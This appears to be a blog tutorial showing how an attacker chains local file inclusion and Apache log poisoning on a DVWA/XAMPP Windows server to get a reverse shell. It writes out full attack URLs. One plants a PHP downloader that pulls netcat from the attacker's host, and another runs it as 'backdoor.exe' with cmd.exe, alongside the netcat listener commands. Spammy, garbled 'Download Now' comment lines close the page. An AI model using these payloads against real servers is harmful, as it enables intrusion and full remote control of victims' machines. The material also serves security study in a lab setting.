PHP script downloader and Reverse Shell with Netcat
Let's say that your server has LFI vulnerability or the attacker could upload an evil php script on your web server. In this case i will explore the first condition which is LFI. Let's create a little more difficult scenario for attacker and something more secure for the victim :)
Webserver has Windows 7 machine + Xampp but has one small misconfiguration problem which can lead to a disastrous for a webserver. The admin forgot to disable those variables in php.ini file register_globals and allow_url and allow for an attacker to include a local or remote file into running php code.
Attacker send this code to webserver log file through Netcat
In victim's machine we can see how the previous request saved in log file
Now attacker visits victim's vulnerable web page with his browser
In linux webserver has this tools preinstalled wget,nc,sbd,ncat but what about windows?I leave as an exersice to you and make your own research about other ways which can give a reverse shell. Attacker wants to download netcat from his server and execute it. The following script downloads file from attacker's server
http://localhost/dvwa/vulnerabilities/fi/?page=C:\xampp\apache\logs\access.log&cmd=echo+"<?php+$socket=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_connect($socket,'192.168.1.6',8888);socket_recv($socket,$buf,29184,MSG_WAITALL);$file=fopen('backdoor.exe','wb');fwrite($file,$buf);socket_close($socket);?>"+>+downloader.php
Attacker uses netcat listener to upload his file but firstly uses upx to compress netcat.
nc -nlvp 8888 < nc.exe
Reverse Shell
After successful download it is time for attacker to execute his backdoor and get a remote shell. It setup a new listener in port 7777
Attacker's Box -> nc -nlvp 7777
http://localhost/dvwa/vulnerabilities/fi/?page=C:\xampp\apache\logs\access.log&cmd=cmd+/c+backdoor.exe+192.168.1.6+7777+-e+cmd.exe
Php Script Er And Reverse Shell With Netcat >>>>> Download Now
ReplyDelete>>>>> Download Full
Php Script Er And Reverse Shell With Netcat >>>>> Download LINK
>>>>> Download Now
Php Script Er And Reverse Shell With Netcat >>>>> Download Full
>>>>> Download LINK F9